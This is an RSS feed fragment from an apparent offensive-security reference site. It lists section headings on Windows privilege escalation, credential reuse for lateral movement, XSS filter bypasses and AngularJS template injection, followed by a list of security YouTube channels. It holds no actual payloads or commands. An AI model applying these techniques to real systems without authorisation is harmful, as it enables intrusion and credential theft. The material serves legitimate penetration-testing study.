&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-in-unattendxml"&gt;Passwords in unattend.xml&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wifi-passwords"&gt;Wifi passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sticky-notes-passwords"&gt;Sticky Notes passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-services"&gt;Passwords stored in services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-key-manager"&gt;Passwords stored in Key Manager&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-history"&gt;Powershell History&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-transcript"&gt;Powershell Transcript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#password-in-alternate-data-stream"&gt;Password in Alternate Data Stream&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---processes-enumeration-and-tasks"&gt;EoP - Processes Enumeration and Tasks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---incorrect-permissions-in-services"&gt;EoP - Incorrect permissions in services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---windows-subsystem-for-linux-wsl"&gt;EoP - Windows Subsystem for Linux (WSL)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---unquoted-service-paths"&gt;EoP - Unquoted Service Paths&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception"&gt;EoP - $PATH Interception&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---named-pipes"&gt;EoP - Named Pipes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---kernel-exploitation"&gt;EoP - Kernel Exploitation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---microsoft-windows-installer"&gt;EoP - Microsoft Windows Installer&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#alwaysinstallelevated"&gt;AlwaysInstallElevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#customactions"&gt;CustomActions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---insecure-gui-apps"&gt;EoP - Insecure GUI apps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---evaluating-vulnerable-drivers"&gt;EoP - Evaluating Vulnerable Drivers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---printers"&gt;EoP - Printers&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#universal-printer"&gt;Universal Printer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#bring-your-own-vulnerability"&gt;Bring Your Own Vulnerability&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---runas"&gt;EoP - Runas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---abusing-shadow-copies"&gt;EoP - Abusing Shadow Copies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---from-local-administrator-to-nt-system"&gt;EoP - From local administrator to NT SYSTEM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---living-off-the-land-binaries-and-scripts"&gt;EoP - Living Off The Land Binaries and Scripts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---impersonation-privileges"&gt;EoP - Impersonation Privileges&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#restore-a-service-accounts-privileges"&gt;Restore A Service Account&amp;rsquo;s Privileges&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#meterpreter-getsystem-and-alternatives"&gt;Meterpreter getsystem and alternatives&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rottenpotato-token-impersonation"&gt;RottenPotato (Token Impersonation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#juicy-potato-abusing-the-golden-privileges"&gt;Juicy Potato (Abusing the golden privileges)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rogue-potato-fake-oxid-resolver"&gt;Rogue Potato (Fake OXID Resolver)&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#efspotato-ms-efsr-efsrpcopenfileraw"&gt;EFSPotato (MS-EFSR EfsRpcOpenFileRaw)&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#PrintSpoofer-Printer-Bug"&gt;PrintSpoofer (Printer Bug)&lt;/a&gt;))&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-write"&gt;EoP - Privileged File Write&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#diaghub"&gt;DiagHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#usodllloader"&gt;UsoDLLLoader&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wertrigger"&gt;WerTrigger&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wermgr"&gt;WerMgr&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-delete"&gt;EoP - Privileged File Delete&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---common-vulnerabilities-and-exposure"&gt;EoP - Common Vulnerabilities and Exposures&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms08-067-netapi"&gt;MS08-067 (NetAPI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7"&gt;MS10-015 (KiTrap0D)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms11-080-afd.sys---microsoft-windows-xp-2003"&gt;MS11-080 (adf.sys)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms15-051---microsoft-windows-2003--2008--7--8--2012"&gt;MS15-051 (Client Copy Image)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64"&gt;MS16-032&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms17-010-eternal-blue"&gt;MS17-010 (Eternal Blue)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#cve-2019-1388"&gt;CVE-2019-1388&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception"&gt;EoP - $PATH Interception&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Using credentials</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-using-credentials/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-using-credentials/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/"&gt;InternalAllTheThings/redteam/access/windows-using-credentials&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#get-credentials"&gt;Get credentials&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#create-your-credential"&gt;Create your credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#guest-credential"&gt;Guest Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#retail-credential"&gt;Retail Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#sandbox-credential"&gt;Sandbox Credential&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#netexec"&gt;NetExec&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#impacket"&gt;Impacket&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#psexec"&gt;PSExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#wmiexec"&gt;WMIExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#smbexec"&gt;SMBExec&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#rdp-remote-desktop-protocol"&gt;RDP Remote Desktop Protocol&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#powershell-remoting-protocol"&gt;Powershell Remoting Protocol&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#powershell-credentials"&gt;Powershell Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#powershell-pssession"&gt;Powershell PSSESSION&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#powershell-secure-strings"&gt;Powershell Secure String&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#ssh-protocol"&gt;SSH Protocol&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#winrm-protocol"&gt;WinRM Protocol&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#wmi-protocol"&gt;WMI Protocol&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#other-methods"&gt;Other methods&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#psexec-sysinternal"&gt;PsExec - Sysinternal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#mount-a-remote-share"&gt;Mount a remote share&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/#run-as-another-user"&gt;Run as another user&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>XSS Filter Bypass</title><link>https://bokkapig.pages.dev/refs/payloads/xss-injection/1-xss-filter-bypass/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/xss-injection/1-xss-filter-bypass/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#bypass-case-sensitive"&gt;Bypass Case Sensitive&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-tag-blacklist"&gt;Bypass Tag Blacklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-word-blacklist-with-code-evaluation"&gt;Bypass Word Blacklist with Code Evaluation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-with-incomplete-html-tag"&gt;Bypass with Incomplete HTML Tag&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-quotes-for-string"&gt;Bypass Quotes for String&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-quotes-in-script-tag"&gt;Bypass Quotes in Script Tag&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-quotes-in-mousedown-event"&gt;Bypass Quotes in Mousedown Event&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-dot-filter"&gt;Bypass Dot Filter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-parenthesis-for-string"&gt;Bypass Parenthesis for String&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-parenthesis-and-semi-colon"&gt;Bypass Parenthesis and Semi Colon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-onxxxx-blacklist"&gt;Bypass onxxxx= Blacklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-space-filter"&gt;Bypass Space Filter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-email-filter"&gt;Bypass Email Filter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-tel-uri-filter"&gt;Bypass Tel URI Filter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-document-blacklist"&gt;Bypass document Blacklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-documentcookie-blacklist"&gt;Bypass document.cookie Blacklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-javascript-inside-a-string"&gt;Bypass using Javascript Inside a String&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-an-alternate-way-to-redirect"&gt;Bypass using an Alternate Way to Redirect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-an-alternate-way-to-execute-an-alert"&gt;Bypass using an Alternate Way to Execute an Alert&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass--using-nothing"&gt;Bypass &amp;ldquo;&amp;gt;&amp;rdquo; using Nothing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass--and--using--and-"&gt;Bypass &amp;ldquo;&amp;lt;&amp;rdquo; and &amp;ldquo;&amp;gt;&amp;rdquo; using ＜ and ＞&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass--using-another-character"&gt;Bypass &amp;ldquo;;&amp;rdquo; using Another Character&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-missing-charset-header"&gt;Bypass using Missing Charset Header&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-html-encoding"&gt;Bypass using HTML encoding&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-katakana"&gt;Bypass using Katakana&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-cuneiform"&gt;Bypass using Cuneiform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-lontara"&gt;Bypass using Lontara&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-ecmascript6"&gt;Bypass using ECMAScript6&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-octal-encoding"&gt;Bypass using Octal encoding&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-unicode"&gt;Bypass using Unicode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-utf-7"&gt;Bypass using UTF-7&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-utf-8"&gt;Bypass using UTF-8&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-utf-16be"&gt;Bypass using UTF-16be&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-utf-32"&gt;Bypass using UTF-32&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-bom"&gt;Bypass using BOM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-using-jsfuck"&gt;Bypass using JSfuck&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="bypass-case-sensitive" class="anchored-heading"&gt;Bypass Case Sensitive&lt;a class="heading-anchor" href="#bypass-case-sensitive" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.&lt;/p&gt;</description></item><item><title>XSS in Angular and AngularJS</title><link>https://bokkapig.pages.dev/refs/payloads/xss-injection/5-xss-in-angular/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/xss-injection/5-xss-in-angular/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#client-side-template-injection"&gt;Client Side Template Injection&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#storedreflected-xss"&gt;Stored/Reflected XSS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#advanced-bypassing-xss"&gt;Advanced Bypassing XSS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#blind-xss"&gt;Blind XSS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#automatic-sanitization"&gt;Automatic Sanitization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="client-side-template-injection" class="anchored-heading"&gt;Client Side Template Injection&lt;a class="heading-anchor" href="#client-side-template-injection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The following payloads are based on Client Side Template Injection.&lt;/p&gt;
&lt;h3 id="storedreflected-xss" class="anchored-heading"&gt;Stored/Reflected XSS&lt;a class="heading-anchor" href="#storedreflected-xss" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ng-app&lt;/code&gt; directive must be present in a root element to allow the client-side injection (cf. &lt;a href="https://docs.angularjs.org/api/ng/directive/ngApp"&gt;AngularJS: API: ngApp&lt;/a&gt;).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AngularJS as of version 1.6 have removed the sandbox altogether&lt;/p&gt;</description></item><item><title>Youtube</title><link>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/youtube/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/youtube/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Discover the best YouTube channels, must-watch conference talks, and handpicked videos on information security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="channels" class="anchored-heading"&gt;Channels&lt;a class="heading-anchor" href="#channels" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@0xdf"&gt;0xdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@assetnote2016"&gt;Assetnote - Surfacing Security Podcast&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@BugBountyReportsExplained"&gt;Bug Bounty Reports Explained&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@codingo"&gt;Codingo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@criticalthinkingpodcast"&gt;Critical Thinking - Bug Bounty Podcast&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@embracethered"&gt;Embrace The Red - wunderwuzzi&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg"&gt;GynvaelEN - Podcasts about CTFs, computer security, programming and similar things.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw"&gt;Hackerone&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q"&gt;Hackersploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/c/hacksplained"&gt;Hacksplained - A Beginner Friendly Guide to Hacking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ"&gt;Hak5&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA"&gt;IppSec Channel - Hack The Box Writeups&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@JackRhysider"&gt;Jack Rhysider - Darknet Diaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw"&gt;John Hammond - Wargames and CTF writeups&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@TheLaluka"&gt;Laluka - OffenSkill - Sharing is Caring&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@lauriewired"&gt;LaurieWired - reverse engineering and research&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"&gt;LiveOverflow - Explore weird machines&amp;hellip;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A"&gt;Murmus CTF - Weekly live streamings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/c/Nahamsec"&gt;Nahamsec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@NetworkChuck"&gt;NetworkChuck&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg"&gt;OJ Reeves&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A"&gt;PwnFunction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@SloppyJoePirates"&gt;SloppyJoePirates CTF Writeups&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw"&gt;stacksmashing / Ghidra Ninja&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/c/STOKfredrik"&gt;STÖK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw"&gt;The Cyber Mentor&lt;/a&gt;&lt;/li&gt;
